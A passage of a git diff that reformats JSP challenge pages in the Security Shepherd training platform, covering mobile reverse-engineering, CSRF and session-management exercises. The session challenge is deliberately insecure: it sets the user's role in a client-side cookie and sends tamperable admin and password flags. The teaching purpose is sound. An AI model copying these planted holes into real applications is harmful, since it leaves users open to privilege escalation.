-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=LevelName%></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%=LevelName%>
-    </h2>
-    <p>
-        <%= paragraph1 %>
-        <br/> <br/>
-        <%=mobile.getString("mobileBlurb.vmLink.1") + " UDataLeakage1.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
-    </p>
-</div>
-<%
-    if (Analytics.googleAnalyticsOn) {
-%><%=Analytics.googleAnalyticsScript%>
-<%
-    }
-%>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%=LevelName%></h2>
+		<p>
+			<%= paragraph1 %>
+			<br /> <br />
+			<%=mobile.getString("mobileBlurb.vmLink.1") + " UDataLeakage1.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+		</p>
+	</div>
+	<%
+		if (Analytics.googleAnalyticsOn) {
+	%><%=Analytics.googleAnalyticsScript%>
+	<%
+		}
+	%>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/5bc811f9e744a71393a277c51bfd8fbb5469a60209b44fa3485c18794df4d5b1.jsp b/src/main/webapp/challenges/5bc811f9e744a71393a277c51bfd8fbb5469a60209b44fa3485c18794df4d5b1.jsp
index 372d463c6..b24834ca7 100644
--- a/src/main/webapp/challenges/5bc811f9e744a71393a277c51bfd8fbb5469a60209b44fa3485c18794df4d5b1.jsp
+++ b/src/main/webapp/challenges/5bc811f9e744a71393a277c51bfd8fbb5469a60209b44fa3485c18794df4d5b1.jsp
@@ -1,91 +1,98 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+*/
 //No Quotes In level Name
-    String levelName = "Mobile Reverse Engineering 2";
+String levelName = "Mobile Reverse Engineering 2";
 //Alphanumeric Only
-    String levelHash = "5bc811f9e744a71393a277c51bfd8fbb5469a60209b44fa3485c18794df4d5b1";
+String levelHash = "5bc811f9e744a71393a277c51bfd8fbb5469a60209b44fa3485c18794df4d5b1";
 
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.reverseEngineer.reverseEngineer", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.reverseEngineer.reverseEngineer", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge2.challengeName");
-    String paragraph1 = bundle.getString("challenge2.para1");
+String LevelName = bundle.getString("challenge2.challengeName");
+String paragraph1 = bundle.getString("challenge2.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=LevelName%>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=LevelName%></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%=LevelName%>
-    </h2>
-    <p>
-        <%= paragraph1 %>
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " ReverseEngineer2.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
-    </p>
-</div>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%=LevelName%></h2>
+		<p>
+			<%= paragraph1 %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " ReverseEngineer2.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
+		</p>
+	</div>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49.jsp b/src/main/webapp/challenges/70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49.jsp
index 501fcefff..8ba7ed405 100644
--- a/src/main/webapp/challenges/70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49.jsp
+++ b/src/main/webapp/challenges/70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49.jsp
@@ -1,180 +1,183 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    // Cross Site Request Forgery Challenge 5
+	// Cross Site Request Forgery Challenge 5
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-    String levelName = "CSRF 5";
-    String levelHash = "70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49";
+String levelName = "CSRF 5";
+String levelHash = "70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
-    String i18nLevelName = bundle.getString("title.csrf5");
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
+String i18nLevelName = bundle.getString("title.csrf5");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String ApplicationRoot = getServletContext().getRealPath("");
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String userClass = null;
-            if (ses.getAttribute("userClass") != null) {
-                userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
-            }
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String ApplicationRoot = getServletContext().getRealPath("");
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		String userClass = null;
+		if(ses.getAttribute("userClass") != null)
+		{
+			userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
+		}
+		String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.intro") %>
-        <br/> <br/> <a> POST /user/csrfchallengefive/plusplus</a> <br/>
-            <%= bundle.getString("challenge.withTheseParameters") %>
-        <a>userId = <%= bundle.getString("challenge.userIdExample") %>
-        </a> &
-        <a>csrfToken = <%= bundle.getString("challenge.yourCsrfTokenCamelCase") %>
-        </a>
-        <br/> <br/>
-            <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>
-            <%= bundle.getString("challenge.userIdExample") %>
-            <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>
-            <%=bundle.getString("challenge.yourIdIs") %>
-            <%= userId %>
-            <%= bundle.getString("challenge.yourIdIs.1") %>
-        <br/> <br/>
-            <%= bundle.getString("challenge.useForumForIframe") %>
-            <%
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.intro") %>
+			<br /> <br /> <a> POST /user/csrfchallengefive/plusplus</a> <br />
+			<%= bundle.getString("challenge.withTheseParameters") %>
+			<a>userId = <%= bundle.getString("challenge.userIdExample") %></a> &
+			<a>csrfToken = <%= bundle.getString("challenge.yourCsrfTokenCamelCase") %></a>
+			<br /> <br />
+			<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>
+			<%= bundle.getString("challenge.userIdExample") %><%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>
+			<%=bundle.getString("challenge.yourIdIs") %>
+			<%= userId %>
+			<%= bundle.getString("challenge.yourIdIs.1") %>
+			<br /> <br />
+			<%= bundle.getString("challenge.useForumForIframe") %>
+			<% 
 				String moduleId = Getter.getModuleIdFromHash(ApplicationRoot, levelHash);	
 				if (Getter.isCsrfLevelComplete(ApplicationRoot, moduleId, userId)) 
 				{ %>
+		
+		<h2 class='title'><%= bundle.getString("result.challengeCompleted") %></h2>
+		<p>
+			<%= bundle.getString("result.congratsTheKeyIs") %>
+			<b> <a><%=	Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String)ses.getAttribute("userName")) %></a></b><br />
+			<br />
+			<% } %>
+		
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("forum.iframe.whatToDo") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="myMessageAris"
+						type="text" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("forum.postMessage") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <h2 class='title'><%= bundle.getString("result.challengeCompleted") %>
-    </h2>
-    <p>
-            <%= bundle.getString("result.congratsTheKeyIs") %>
-        <b>
-            <a><%=    Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String) ses.getAttribute("userName")) %>
-            </a></b><br/>
-        <br/>
-            <% } %>
-
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("forum.iframe.whatToDo") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="myMessageAris"
-                           type="text"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("forum.postMessage") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv">
-        <%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theMessage = $("#myMessageAris").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    myMessage: theMessage,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv">
+			<%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theMessage = $("#myMessageAris").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							myMessage: theMessage,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.jsp b/src/main/webapp/challenges/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.jsp
index 4b689bca0..a691ea80b 100644
--- a/src/main/webapp/challenges/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.jsp
+++ b/src/main/webapp/challenges/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.jsp
@@ -1,154 +1,162 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Broken Authentication and Session Management Challenge eight
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * Broken Authentication and Session Management Challenge eight
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "Session Management Challenge 8";
-    String levelHash = new String("714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334");
+String levelName = "Session Management Challenge 8";
+String levelHash = new String("714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334");
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
+String i18nLevelName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <!-- <%= bundle.getString("challenge.comment") %> --><%= bundle.getString("challenge.description.2") %>
-        <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.privilegedButton") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<!-- <%= bundle.getString("challenge.comment") %> --><%= bundle.getString("challenge.description.2") %>
+			<br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.privilegedButton") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            document.cookie = "challengeRole=LmH6nmbC";
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    returnUserRole: "false",
-                    returnPassword: "false",
-                    adminDetected: "false"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-    $("#aUserName").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
-
-    $("#showLesson").click(function () {
